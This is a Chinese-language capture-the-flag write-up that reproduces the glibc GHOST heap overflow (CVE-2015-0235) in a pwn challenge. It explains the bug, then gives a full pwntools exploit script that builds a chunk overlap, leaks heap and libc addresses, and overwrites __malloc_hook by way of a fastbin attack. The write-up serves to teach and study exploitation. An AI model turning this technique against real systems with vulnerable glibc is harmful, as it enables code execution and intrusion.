CVE-2015-0235

GHOST : CVE-2015-0235

之前没接触过CVE，但是巅峰极客碰到一题居然利用到了CVE里的漏洞，而且只公布了POC，找不到exp（其实就算有估计也不会用……）。现在复现一下。

之前国赛决赛也出现了自己实现了http服务的题目。不知道越来越贴近实战是不是一个趋势。（二进制真就虽然人少但是卷得狠啊）

漏洞描述

glibc的__nss_hostname_digits_dots存在缓冲区溢出漏洞（堆溢出），可以通过gethostbyname *()函数触发。先介绍一下这个函数，它的功能是将主机名称转换为ipv4地址，但是如果输入本就是ip，则不会通过DNS解析，而是将会不加任何合法性检验地被直接写入tmp.buffer，一同写入的还包括解析的主机信息。所以就很容易超过tmp.buffer的长度，造成溢出。

出题人说0是最容易造成溢出的。

• 通过gethostbyname()函数或gethostbyname2()函数，将可能产生一个堆上的缓冲区溢出
• 经由gethostbyname_r()或gethostbyname2_r()，则会触发调用者提供的缓冲区溢出
• 漏洞产生时至多sizeof(char* )个字节可被覆盖。但是payload中只有数字( ‘0 ‘…’ 9’) ，点( “.”) ，和一个终止空字符(‘\0’ ) 可用。
• 影响范围：2.2 <= glibc <=2.17

分析

gethostbyname() 先通过__nss_hostname_digits_dots()判断参数是否为IP，如果是IP就直接结束；如果是域名则调用__gethostbyname_r()进行解析。漏洞发生在__nss_hostname_digits_dots()中。

• 漏洞函数：nss/digits_dots.c :__nss_hostname_digits_dots(name, resbuf, buffer, …)
  • 这个函数负责处理name为IP地址的情况, 当name为域名时只是进行一些复制工作
  • name指向要解析的字符串
  • resbuf指向存放解析结果的hostennt结构体
  • buffer则为解析时所分配的空间, resbuf中的指针指向buffer分配的空间

而且判断很随意只要name[0]是int,hex或者’:’就认为是ip地址。

在计算hostent结构体所需大小时忘记了h_alias_ptr，然后又直接通过strcpy()把hostname复制过去造成了一个机器字长的溢出。

strcpy()在溢出这一块老演员了属于是

赛题

巅峰极客 ghost

[*] '/home/giantbranch/Desktop/ghost/pwn'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

InputName()未对idx是否已经存在做检验，len也没有限制。然后直接调用gethostbyname_r()。函数会以此分配 NameArr[idx], HostArr[idx], BufferArr[idx] ，所以堆块的布局都是按照N|H|B这个顺序

已知存在堆溢出，那就可以通过覆盖size位实现chunk overlap。

LEAK

• 假如有N0 | B0|H0 | N1 | B1 | H1
• 利用__nss_hostname_digits_dots()在写入B0时溢出H0的chunk size为0x3031
• 然后通过布局在H0+0x3030的位置放上flat(0, 0x21, 0, 0)伪造H0的nextchunk
  free(H0)即可打出chunk overlap, 此时获得了一个B0, H0, N1, B1,H1组成的UB chunk
• 然后通过切割UB, 使得UB的fd bk指针写入到H1内部, 如下图
• 然后show(3)即可泄露地址

FASTBIN ATTACK

• 在H1后面通过布局0x70的chunk, 然后free掉, 进入Fastbin[0x70]
• 然后继续切割chunk, 修改fastbin chunk的fd为__malloc_hook-0x23, 利用0x7F伪造size
• 然后修改__malloc_hook为OGG

EXP

#! /usr/bin/python
# coding=utf-8
#import sys
from pwn import *
#from random import randint

context.log_level = 'debug'
context(arch='amd64', os='linux')

elf_path = "./pwn"

elf = ELF(elf_path)
libc = ELF('libc.so.6')
#p = process(["ld.so.2","./pwn"],env={"LD_PRELOAD":"./libc.so.6"}) 
p = process('./pwn')

sda = lambda x,y:p.sendlineafter(x,y)
sdl = lambda x:p.sendline(x)
rct = lambda x:p.recvuntil(x)
prt = lambda x:log.info('\x1b[01;38;5;214m' + x + '==>' + hex(eval(x)) + '\x1b[0m')

def Name(idx, name):
    rct('>>')
    sdl(str(1))
    rct('idx:')
    sdl(str(idx))
    rct('len:')
    sdl(str(len(name)))
    sdl(name)

def Show(idx):
    rct('>>')
    sdl(str(2))
    rct('idx:')
    sdl(str(idx))

def Delete(idx):
    rct('>>')
    sdl(str(3))
    rct('idx:')
    sdl(str(idx))

#chunk overlap
Name(0, '0'*0x2F)
Name(1, '0'*0x40+'10')
Name(2, '0'*0x5F)
Name(3, '0'*0x1F)

Delete(3)
Name(3, '0'*0x1F)        #switch Name and Host

Name(10, '0'*0x5F)
Name(11, '0'*0x5F)
Name(12, '0'*0x5F)
Name(13, '0'*0x5F)


exp = '0'*0x2950
exp+= flat(0, 0x21, 0, 0)    #B0's next chunk
Name(5, exp)
Delete(1)                #UB<=>(H0, 0x3030)

#leak addr
exp = '0'.ljust(0x7F, '\x00')
Name(6, exp)            #split UB chunk, H3's h_addr_list=UB's bk
Show(3)

rct('0'*0x1F+'\n\n')
heap_addr = u64(p.recv(6).ljust(8, '\x00'))-0x358
prt('heap_addr')
p.recv(17)
libc.address = u64(p.recv(6).ljust(8, '\x00'))-0x3c17a8
prt('libc.address')

#fastbin Attack
Delete(10)
exp = '0'*0x4F
Name(7, exp)

exp = '0'*0x10
exp+= flat(0, 0x71, libc.symbols['__malloc_hook']-0x23)
exp = exp.ljust(0xBF, '0')
Name(7, exp)

Name(8, '0'*0x5F)

exp = '0'*0x13
exp+= p64(libc.address+0x462b8)
Name(8, exp.ljust(0x5F, '0'))

p.interactive()